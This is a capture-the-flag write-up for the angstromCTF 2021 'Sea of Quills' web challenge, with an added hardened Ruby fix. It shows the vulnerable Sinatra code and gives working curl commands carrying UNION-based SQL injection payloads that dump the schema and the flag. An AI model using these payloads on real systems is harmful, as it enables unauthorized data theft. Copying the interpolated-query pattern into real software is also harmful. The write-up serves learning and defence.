ångstromCTF 2021: Sea of Quills

Sea of Quills

Category: Web

70 points

Come check out our finest selection of quills!

app.rb

Author: JoshDaBosh

app.rb

require 'sinatra'
require 'sqlite3'

set :bind, "0.0.0.0"
set :port, 4567

get '/' do
  db = SQLite3::Database.new "quills.db"
  @row = db.execute("select * from quills")

  erb :index
end

get '/quills' do
  erb :quills
end

post '/quills' do
  db = SQLite3::Database.new "quills.db"
  cols = params[:cols]
  lim = params[:limit]
  off = params[:offset]

  # Character blacklist applied to cols only; it rejects a handful of
  # characters but not SQL keywords such as "from", "union" or "select"
  blacklist = ["-", "/", ";", "'", "\""]

  blacklist.each { |word|
    if cols.include? word
      return "beep boop sqli detected!"
    end
  }

  # limit and offset must be digits only (in Ruby, ^ and $ are line anchors)
  if !/^[0-9]+$/.match?(lim) || !/^[0-9]+$/.match?(off)
    return "bad, no quills for you!"
  end

  # cols is interpolated straight into the query string
  @row = db.execute("select %s from quills limit %s offset %s" % [cols, lim, off])

  p @row

  erb :specific
end

Solution

To look around, the cols parameter is used to union the schema from sqlite_master into the result; the payload contains none of the blacklisted characters, so the check lets it through:

curl 'https://seaofquills.2021.chall.actf.co/quills' --data-raw 'limit=100&offset=0&cols=tbl_name%2Cname%2Csql%20from%20sqlite_master%20union%20select%20url%2Cdesc%2Cname'

Honey in the output:

<img src="flagtable" class="w3 h3">
				<li class="pb5 pl3">flagtable <ul><li>CREATE TABLE flagtable (
		flag varchar(30)
	)</li></ul></li><br />

Let’s take a look a bit closer…

curl 'https://seaofquills.2021.chall.actf.co/quills' --data-raw 'limit=100&offset=0&cols=flag%2Cflag%2Cflag%20from%20flagtable%20union%20select%20url%2Cdesc%2Cname'
<img src="actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}" class="w3 h3">
				<li class="pb5 pl3">actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df} <ul><li>actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}</li></ul></li><br />
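As an added example (not the challenge's app.rb), the following Ruby reproduces the handler's two checks next to an allowlist-based query builder that rejects the payload above. The column names url, desc and name are assumed from the union payload, and the page-size cap is an assumed policy.

```ruby
# Added example, not part of the challenge code. The handler's blacklist looks
# only for a few characters in cols; the payload used in the solution
# ("... from sqlite_master union select ...") contains none of them, so it
# passes and is interpolated into the SQL string. The fix is to never splice
# caller-controlled identifiers: resolve each column against a fixed allowlist
# and hand limit/offset to the driver as bound integers.

BLACKLIST = ["-", "/", ";", "'", "\""].freeze
ALLOWED_COLS = %w[url desc name].freeze  # assumed: the quills table's columns

# The original cols check, reproduced for comparison: true means "let through".
def blacklist_passes?(cols)
  BLACKLIST.none? { |w| cols.to_s.include?(w) }
end

# The original limit/offset check: in Ruby ^ and $ match at line boundaries,
# so a value with an embedded newline still passes.
def original_numeric?(v)
  /^[0-9]+$/.match?(v.to_s)
end

# Hardened builder: returns [sql, binds] or nil when any input is rejected.
def build_quills_query(cols, lim, off)
  requested = cols.to_s.split(",").map(&:strip)
  return nil if requested.empty?
  return nil unless requested.all? { |c| ALLOWED_COLS.include?(c) }
  return nil unless /\A[0-9]+\z/.match?(lim.to_s) && /\A[0-9]+\z/.match?(off.to_s)
  limit = Integer(lim, 10)
  offset = Integer(off, 10)
  return nil if limit > 100  # cap page size (assumed policy)
  # Identifiers come from the allowlist, so splicing them is safe; the numeric
  # values go through bound parameters instead of string formatting.
  sql = "select #{requested.join(', ')} from quills limit ? offset ?"
  [sql, [limit, offset]]
end

if __FILE__ == $0
  payload = "tbl_name,name,sql from sqlite_master union select url,desc,name"
  puts "blacklist lets payload through: #{blacklist_passes?(payload)}"
  p build_quills_query(payload, "100", "0")   # nil: rejected
  p build_quills_query("url,name", "10", "0") # allowlisted columns, bound ints
end
```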


Flag

actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}

luc © 2021